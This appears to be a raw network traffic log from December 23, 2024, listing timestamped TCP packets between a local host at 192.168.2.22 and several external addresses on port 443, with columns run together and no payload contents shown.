                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.488945007 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.493762016 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.493833065 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.493926048 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.493983030 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.497770071 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.497838974 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.504785061 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.504853964 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.506795883 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.506864071 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.515547991 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.515619993 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.517683029 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.517755032 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.526422024 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.526535988 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.527745008 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.527810097 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.537130117 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.537221909 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.538451910 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.538537025 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.547698021 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.547764063 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.549002886 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.549065113 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.558442116 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.558518887 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.558576107 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.558641911 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.569178104 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.569246054 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.569324017 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.569389105 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.579282999 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.579350948 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.579444885 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.579507113 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.589184999 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.589255095 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.589334011 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.589448929 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.598529100 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.598592997 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.598675013 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.598737001 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.607557058 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.607630014 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.607682943 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.607743025 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.616483927 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.616552114 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.616698980 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.616760969 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.617775917 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.617846966 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.625341892 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.625411987 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.626138926 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.626208067 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.633297920 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.633361101 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.634118080 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.634181976 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.641335011 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.641401052 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.642590046 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.642657995 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.642682076 CET44349168142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.642698050 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:17.642746925 CET49168443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846425056 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846457958 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846518040 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846836090 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846849918 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.847136021 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.847218990 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.847336054 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.847713947 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.847743034 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.485744953 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.485820055 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.491482019 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.491517067 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.492049932 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.492120028 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.493920088 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.493977070 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.494718075 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.499119043 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.499125957 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.499675989 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.499727011 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.502161980 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.535356045 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:00.547334909 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.038796902 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.038971901 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.038991928 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.039038897 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.039057970 CET4434921416.12.2.60192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.039108038 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.039344072 CET49214443192.168.2.2216.12.2.60
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.049316883 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.049582958 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.049609900 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:01.049705982 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:04.856975079 CET49213443192.168.2.223.5.234.55
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:04.856995106 CET443492133.5.234.55192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.342231989 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.342283010 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.342338085 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.584347010 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.584362984 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:09.976003885 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:09.976070881 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:09.980931044 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:09.980937958 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:09.981391907 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:09.981437922 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.038012981 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.079324007 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487447023 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487500906 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487509966 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487545967 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487550020 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487580061 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487613916 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.487652063 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.494775057 CET49218443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.494791985 CET4434921892.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.495783091 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.495815039 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.495879889 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.496226072 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:10.496244907 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:11.902065039 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:11.902180910 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:11.903708935 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:11.903717041 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:11.905544996 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:11.905550003 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.439270020 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.439359903 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.439378023 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.439424038 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631061077 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631094933 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631150007 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631154060 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631165028 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631195068 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631283045 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.631283045 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660273075 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660314083 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660334110 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660343885 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660355091 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660383940 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660388947 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660424948 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660433054 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660475016 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660695076 CET49219443192.168.2.2292.205.57.102
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:12.660705090 CET4434921992.205.57.102192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:13.552273035 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:13.552364111 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:13.552421093 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:13.552694082 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:13.552726030 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.242870092 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.242940903 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.244425058 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.244440079 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.246144056 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.246155977 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930619001 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930700064 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930711031 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930747986 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930782080 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930783033 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930805922 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930818081 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930844069 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930847883 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930875063 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930892944 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930917025 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.930942059 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.938541889 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.938608885 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.943439960 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.943522930 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.943543911 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.943605900 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.951613903 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.951673031 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.957282066 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:15.957345009 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.050252914 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.050301075 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.050314903 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.050343990 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.050370932 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.050394058 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.054390907 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.054466963 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.116496086 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.116556883 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.122164965 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.122232914 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.125967026 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.126029968 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.127135038 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.127193928 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.134376049 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.134433031 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.137008905 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.137075901 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.142745018 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.142817020 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.150696993 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.150753021 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.154227018 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.154284000 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.164313078 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.164361954 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.167872906 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.167928934 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.177941084 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.177990913 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.178008080 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.178056002 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.191437006 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.191484928 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.191493988 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.191508055 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.191551924 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.191551924 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.204199076 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.204267979 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.204422951 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.204467058 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.217058897 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.217125893 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.217283964 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.217329025 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.218534946 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.228063107 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.229633093 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.229681969 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.229841948 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.229890108 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.242588997 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.242651939 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.242791891 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.242846012 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.255135059 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.255197048 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.255225897 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.255280972 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.314233065 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.314285994 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.314297915 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.314318895 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.314343929 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.314364910 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.316467047 CET44349222142.250.181.130192.168.2.22
